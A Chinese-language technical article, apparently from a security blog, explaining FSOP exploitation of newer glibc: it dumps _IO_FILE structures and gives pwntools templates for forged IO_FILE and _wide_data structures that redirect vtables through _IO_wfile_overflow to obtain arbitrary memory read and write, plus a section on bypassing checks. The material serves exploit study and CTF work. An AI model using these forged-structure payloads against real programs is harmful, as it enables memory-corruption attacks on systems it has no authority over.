高版本glibc通过IO_FILE的任意地址读写技术分析<\/h1>

一、IO_FILE结构概述<\/h2>

1.1 核心结构体定义<\/h3>
_IO_FILE_plus结构体<\/strong><\/p>
struct<\/span> _IO_FILE_plus {
<\/span><\/span>    FILE file;
<\/span><\/span>    const<\/span> struct<\/span> _IO_jump_t *<\/span>vtable;
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>_IO_FILE结构体<\/strong><\/p>
struct<\/span> _IO_FILE {
<\/span><\/span>    int<\/span> _flags;                    \/* 高16位为_IO_MAGIC；其余为标志位 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    \/* 以下指针与C++的streambuf协议对应 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_read_ptr;           \/* 当前读取指针 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_read_end;           \/* 获取区结束位置 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_read_base;          \/* 回退+获取区起始位置 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_write_base;         \/* 写入区起始位置 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_write_ptr;          \/* 当前写入指针 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_write_end;          \/* 写入区结束位置 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_buf_base;           \/* 缓冲区起始位置 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_buf_end;            \/* 缓冲区结束位置 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    \/* 以下字段用于支持"回退"与"撤销"操作 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_save_base;          \/* 非当前获取区起始指针 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_backup_base;        \/* 备份区中第一个有效字符的指针 *\/<\/span>
<\/span><\/span>    char<\/span> *<\/span>_IO_save_end;           \/* 非当前获取区结束指针 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    struct<\/span> _IO_marker *<\/span>_markers;  \/* 标记链表 *\/<\/span>
<\/span><\/span>    struct<\/span> _IO_FILE *<\/span>_chain;      \/* 文件链表指针 *\/<\/span>
<\/span><\/span>    int<\/span> _fileno;                  \/* 文件描述符 *\/<\/span>
<\/span><\/span>    int<\/span> _flags2;                  \/* 扩展标志 *\/<\/span>
<\/span><\/span>    __off_t _old_offset;          \/* 原_offset字段 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    unsigned<\/span> short<\/span> _cur_column;   \/* 列号 *\/<\/span>
<\/span><\/span>    signed<\/span> char<\/span> _vtable_offset;   \/* 虚表偏移 *\/<\/span>
<\/span><\/span>    char<\/span> _shortbuf[1<\/span>];            \/* 短缓冲 *\/<\/span>
<\/span><\/span>    _IO_lock_t *<\/span>_lock;            \/* 线程锁 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    \/* 扩展字段 *\/<\/span>
<\/span><\/span>    __off64_t _offset;           \/* 64位文件偏移 *\/<\/span>
<\/span><\/span>    struct<\/span> _IO_codecvt *<\/span>_codecvt; \/* 编码转换表 *\/<\/span>
<\/span><\/span>    struct<\/span> _IO_wide_data *<\/span>_wide_data; \/* 宽字符缓冲区 *\/<\/span>
<\/span><\/span>    struct<\/span> _IO_FILE *<\/span>_freeres_list; \/* 空闲链表 *\/<\/span>
<\/span><\/span>    void<\/span> *<\/span>_freeres_buf;           \/* 空闲缓冲 *\/<\/span>
<\/span><\/span>    size_t __pad5;                \/* 对齐填充 *\/<\/span>
<\/span><\/span>    int<\/span> _mode;                    \/* 宽\/字节模式 *\/<\/span>
<\/span><\/span>    char<\/span> _unused2[15<\/span> *<\/span> sizeof<\/span>(int<\/span>) -<\/span> 4<\/span> *<\/span> sizeof<\/span>(void<\/span> *<\/span>) -<\/span> sizeof<\/span>(size_t)];
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>_IO_jump_t虚表结构<\/strong><\/p>
struct<\/span> _IO_jump_t {
<\/span><\/span>    JUMP_FIELD(size_t, __dummy);
<\/span><\/span>    JUMP_FIELD(size_t, __dummy2);
<\/span><\/span>    JUMP_FIELD(_IO_finish_t, __finish);
<\/span><\/span>    JUMP_FIELD(_IO_overflow_t, __overflow);
<\/span><\/span>    JUMP_FIELD(_IO_underflow_t, __underflow);
<\/span><\/span>    JUMP_FIELD(_IO_underflow_t, __uflow);
<\/span><\/span>    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
<\/span><\/span>    JUMP_FIELD(_IO_xsputn_t, __xsputn);
<\/span><\/span>    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
<\/span><\/span>    JUMP_FIELD(_IO_seekoff_t, __seekoff);
<\/span><\/span>    JUMP_FIELD(_IO_seekpos_t, __seekpos);
<\/span><\/span>    JUMP_FIELD(_IO_setbuf_t, __setbuf);
<\/span><\/span>    JUMP_FIELD(_IO_sync_t, __sync);
<\/span><\/span>    JUMP_FIELD(_IO_doallocate_t, __doallocate);
<\/span><\/span>    JUMP_FIELD(_IO_read_t, __read);
<\/span><\/span>    JUMP_FIELD(_IO_write_t, __write);
<\/span><\/span>    JUMP_FIELD(_IO_seek_t, __seek);
<\/span><\/span>    JUMP_FIELD(_IO_close_t, __close);
<\/span><\/span>    JUMP_FIELD(_IO_stat_t, __stat);
<\/span><\/span>    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
<\/span><\/span>    JUMP_FIELD(_IO_imbue_t, __imbue);
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>_IO_wide_data宽字符数据结构<\/strong><\/p>
struct<\/span> _IO_wide_data {
<\/span><\/span>    wchar_t *<\/span>_IO_read_ptr;        \/* 当前读取指针 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_read_end;        \/* 获取区域结束位置 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_read_base;       \/* 回退+获取区域起始位置 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_write_base;      \/* 写入区域起始位置 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_write_ptr;       \/* 当前写入指针 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_write_end;       \/* 写入区域结束位置 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_buf_base;        \/* 缓冲区起始位置 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_buf_end;         \/* 缓冲区结束位置 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    wchar_t *<\/span>_IO_save_base;       \/* 非当前获取区域起始指针 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_backup_base;     \/* 备份区域指针 *\/<\/span>
<\/span><\/span>    wchar_t *<\/span>_IO_save_end;        \/* 非当前获取区域结束指针 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    __mbstate_t _IO_state;       \/* 当前多字节转换状态 *\/<\/span>
<\/span><\/span>    __mbstate_t _IO_last_state;   \/* 上次多字节转换状态 *\/<\/span>
<\/span><\/span>    struct<\/span> _IO_codecvt _codecvt;  \/* 编码转换相关数据 *\/<\/span>
<\/span><\/span>    wchar_t _shortbuf[1<\/span>];         \/* 短缓冲区 *\/<\/span>
<\/span><\/span>    const<\/span> struct<\/span> _IO_jump_t *<\/span>_wide_vtable; \/* 宽字符虚表指针 *\/<\/span>
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>1.2 标准IO_FILE实例分析<\/h3>
stdin结构示例<\/strong><\/p>
_IO_2_1_stdin_ = {
    file = {
        _flags = -72540021,
        _IO_read_ptr = 0x75b77e603963 <_IO_2_1_stdin_+131> "",
        _IO_read_end = 0x75b77e603963 <_IO_2_1_stdin_+131> "",
        _IO_read_base = 0x75b77e603963 <_IO_2_1_stdin_+131> "",
        _IO_write_base = 0x75b77e603963 <_IO_2_1_stdin_+131> "",
        _IO_write_ptr = 0x75b77e603963 <_IO_2_1_stdin_+131> "",
        _IO_write_end = 0x75b77e603963 <_IO_2_1_stdin_+131> "",
        _IO_buf_base = 0x75b77e603963 <_IO_2_1_stdin_+131> "",
        _IO_buf_end = 0x75b77e603964 <_IO_2_1_stdin_+132> "",
        ...
        _lock = 0x75b77e605720 <_IO_stdfile_0_lock>,
        _wide_data = 0x75b77e6039c0 <_IO_wide_data_0>,
    },
    vtable = 0x75b77e602030 <_IO_file_jumps>
}
<\/code><\/pre>
stdout结构示例<\/strong><\/p>
_IO_2_1_stdout_ = {
    file = {
        _flags = -72537977,
        _IO_read_ptr = 0x75b77e604643 <_IO_2_1_stdout_+131> "\n",
        ...
        _chain = 0x75b77e6038e0 <_IO_2_1_stdin_>,
        _fileno = 1,
        _lock = 0x75b77e605710 <_IO_stdfile_1_lock>,
        _wide_data = 0x75b77e6037e0 <_IO_wide_data_1>,
    },
    vtable = 0x75b77e602030 <_IO_file_jumps>
}
<\/code><\/pre>
二、基础利用技术<\/h2>
2.1 字节覆盖技术<\/h3>
原理分析<\/strong><\/p>

通过覆盖stdin的_IO_buf_base<\/code>最低字节为\x00<\/code>，使其指向自身的_IO_write_base<\/code>区域<\/li>
当大量数据写入时，可以覆盖从该位置到_IO_buf_end<\/code>的内存区域<\/li>
通过修改_IO_buf_base<\/code>和_IO_buf_end<\/code>实现二次任意地址写<\/li>
需要fgets等函数触发stdin刷新机制<\/li>
<\/ul>
三、任意地址读技术<\/h2>
3.1 利用方法<\/h3>
fif_leak_stack =<\/span> flat({
<\/span><\/span>    0x00<\/span>: 0x800<\/span> |<\/span> 0x1000<\/span>,        # _flags<\/span>
<\/span><\/span>    0x20<\/span>: _IO_write_base,         # 要泄露区域的起始地址<\/span>
<\/span><\/span>    0x28<\/span>: _IO_write_ptr,          # 要泄露区域的结束地址<\/span>
<\/span><\/span>    0x68<\/span>: _chain,                 # _chain<\/span>
<\/span><\/span>    0x70<\/span>: _fileno,                # _fileno<\/span>
<\/span><\/span>    0x88<\/span>: _lock,                  # _lock <\/span>
<\/span><\/span>    0xd8<\/span>: vtable,                 # vtable<\/span>
<\/span><\/span>}, filler =<\/span> b<\/span>"<\/span>\x00<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>3.2 原理分析<\/h3>
正常_IO_flush_all<\/code>执行时：<\/p>

遍历_IO_list_all<\/code>链表中的每个IO_FILE<\/li>
调用vtable中的overflow<\/code>函数<\/li>
在_IO_new_file_overflow<\/code>函数中调用_IO_do_write<\/code><\/li>
将未输出完的数据输出到指定位置<\/li>
<\/ol>
四、任意地址写技术<\/h2>
4.1 伪造IO_FILE结构<\/h3>
fake_io_to_read =<\/span> flat({
<\/span><\/span>    0x00<\/span>: 0<\/span>,                      # _flags<\/span>
<\/span><\/span>    0x38<\/span>: _IO_buf_base,           # _IO_buf_base<\/span>
<\/span><\/span>    0x40<\/span>: _IO_buf_end,            # _IO_buf_end<\/span>
<\/span><\/span>    0x68<\/span>: _chain,                 # _chain (FSOP关键)<\/span>
<\/span><\/span>    0x70<\/span>: 0<\/span>,                      # _fileno (标准输入)<\/span>
<\/span><\/span>    0x88<\/span>: _lock,                  # _lock (不可为0)<\/span>
<\/span><\/span>    0xa0<\/span>: _wide_data,             # _wide_data地址<\/span>
<\/span><\/span>    0xc0<\/span>: 2<\/span>,                      # _mode (绕过检查)<\/span>
<\/span><\/span>    0xd8<\/span>: vtable,                 # vtable<\/span>
<\/span><\/span>}, filler =<\/span> b<\/span>"<\/span>\x00<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>fake_wide_data =<\/span> flat({
<\/span><\/span>    0x18<\/span>: 0<\/span>,                      # _IO_write_base<\/span>
<\/span><\/span>    0x20<\/span>: 0xff<\/span>,                   # _IO_write_ptr<\/span>
<\/span><\/span>    0xe0<\/span>: _wide_vtable,           # 填_IO_file_jumps - 0x48<\/span>
<\/span><\/span>}, filler =<\/span> b<\/span>"<\/span>\x00<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>4.2 核心调用链分析<\/h3>
4.2.1 调用入口：_IO_flush_all<\/h4>
int<\/span> _IO_flush_all<\/span>(void<\/span>) {
<\/span><\/span>    for<\/span> (fp =<\/span> (FILE *<\/span>) _IO_list_all; fp !=<\/span> NULL; fp =<\/span> fp-><\/span>_chain) {
<\/span><\/span>        if<\/span> (((fp-><\/span>_mode <=<\/span> 0<\/span> &&<\/span> fp-><\/span>_IO_write_ptr ><\/span> fp-><\/span>_IO_write_base)
<\/span><\/span>            ||<\/span> (_IO_vtable_offset (fp) ==<\/span> 0<\/span>
<\/span><\/span>                &&<\/span> fp-><\/span>_mode ><\/span> 0<\/span> &&<\/span> (fp-><\/span>_wide_data-><\/span>_IO_write_ptr
<\/span><\/span>                ><\/span> fp-><\/span>_wide_data-><\/span>_IO_write_base))
<\/span><\/span>            ) &&<\/span> _IO_OVERFLOW (fp, EOF) ==<\/span> EOF) {
<\/span><\/span>            result =<\/span> EOF;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> result;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2.2 宏展开过程<\/h4>
\/\/ 宏调用链
<\/span><\/span><\/span><\/span>_IO_OVERFLOW(FP, CH)
<\/span><\/span>↓<\/span>
<\/span><\/span>JUMP1(__overflow, FP, CH)
<\/span><\/span>↓<\/span>
<\/span><\/span>(_IO_JUMPS_FUNC(THIS)-><\/span>FUNC)(THIS, X1)
<\/span><\/span>↓<\/span>
<\/span><\/span>\/\/ 无offset情况
<\/span><\/span><\/span><\/span>_IO_JUMPS_FUNC(THIS) =<\/span> (IO_validate_vtable(_IO_JUMPS_FILE_plus(THIS)))
<\/span><\/span>↓<\/span>
<\/span><\/span>_IO_JUMPS_FILE_plus(THIS) =<\/span> _IO_CAST_FIELD_ACCESS((THIS), struct<\/span> _IO_FILE_plus, vtable)
<\/span><\/span>↓<\/span>
<\/span><\/span>fp-><\/span>vtable-><\/span>__overflow(fp, EOF)
<\/span><\/span><\/code><\/pre>4.2.3 虚表函数定位<\/h4>
正常文件跳转表<\/strong><\/p>
[IO_FILE_JUMPS] =<\/span> {
<\/span><\/span>    JUMP_INIT(overflow, _IO_file_overflow),
<\/span><\/span>    \/\/ 其他函数...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>[IO_WFILE_JUMPS] =<\/span> {
<\/span><\/span>    JUMP_INIT(overflow, (_IO_overflow_t)_IO_wfile_overflow),
<\/span><\/span>    \/\/ 其他函数...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2.4 关键函数：_IO_wfile_overflow<\/h4>
wint_t _IO_wfile_overflow<\/span>(FILE *<\/span>f, wint_t wch) {
<\/span><\/span>    if<\/span> (f-><\/span>_wide_data-><\/span>_IO_write_base ==<\/span> 0<\/span>) {
<\/span><\/span>        _IO_wdoallocbuf(f);  \/\/ 关键调用点
<\/span><\/span><\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2.5 内存分配函数：_IO_wdoallocbuf<\/h4>
void<\/span> _IO_wdoallocbuf<\/span>(FILE *<\/span>fp) {
<\/span><\/span>    if<\/span> (fp-><\/span>_wide_data-><\/span>_IO_buf_base) return<\/span>;
<\/span><\/span>    if<\/span> (!<\/span>(fp-><\/span>_flags &<\/span> _IO_UNBUFFERED))
<\/span><\/span>        if<\/span> ((wint_t)_IO_WDOALLOCATE(fp) !=<\/span> WEOF) return<\/span>;
<\/span><\/span>    _IO_wsetb(fp, fp-><\/span>_wide_data-><\/span>_shortbuf, 
<\/span><\/span>              fp-><\/span>_wide_data-><\/span>_shortbuf +<\/span> 1<\/span>, 0<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2.6 宽字符虚表调用<\/h4>
#define _IO_WDOALLOCATE(FP) WJUMP0(__doallocate, FP)
<\/span><\/span><\/span>#define _IO_WIDE_JUMPS(THIS) \
<\/span><\/span><\/span>    _IO_CAST_FIELD_ACCESS((THIS), struct _IO_FILE, _wide_data)->_wide_vtable
<\/span><\/span><\/span><\/code><\/pre>4.3 技术关键点<\/h3>

虚表替换<\/strong>：将fp->vtable<\/code>改为_IO_wfile_jumps<\/code>地址<\/li>
宽虚表控制<\/strong>：将fp->_wide_data->_wide_vtable<\/code>设为_IO_file_jumps - 0x48<\/code><\/li>
函数重定向<\/strong>：使_IO_WDOALLOCATE<\/code>调用_IO_new_file_underflow<\/code>而非原本函数<\/li>
条件绕过<\/strong>：利用宽字符相关条件绕过第一个检查条件<\/li>
<\/ol>
4.4 完整攻击调用链<\/h3>
_IO_flush_all
↓
_IO_OVERFLOW (由于修改vtable指向_IO_wfile_jumps)
↓
_IO_wfile_overflow
↓
_IO_wdoallocbuf
↓
_IO_WDOALLOCATE (由于修改_wide_vtable指向_IO_file_jumps-0x48)
↓
_IO_new_file_underflow (实际执行)
↓
_IO_SYSREAD (实现任意地址读写)
<\/code><\/pre>
五、技术要点总结<\/h2>
5.1 必要条件<\/h3>

能够控制IO_FILE结构内容<\/li>
能够触发_IO_flush_all<\/code>调用（如程序退出时）<\/li>
了解目标系统的glibc版本和内存布局<\/li>
<\/ol>
5.2 关键偏移量<\/h3>

__doallocate<\/code>在虚表中的偏移：0x68<\/li>
_IO_file_jumps<\/code>与_IO_wfile_jumps<\/code>的相对位置<\/li>
各个结构体字段的精确偏移<\/li>
<\/ul>
5.3 防御绕过技巧<\/h3>

使用_wide_data<\/code>相关条件绕过常规检查<\/li>
合理设置_mode<\/code>字段绕过模式检查<\/li>
确保_lock<\/code>指针有效避免崩溃<\/li>
<\/ol>
该技术通过精心构造IO_FILE结构，利用glibc中文件操作的虚表机制，实现了在高版本glibc下的任意地址读写能力，是FSOP攻击技术的重要发展。<\/p>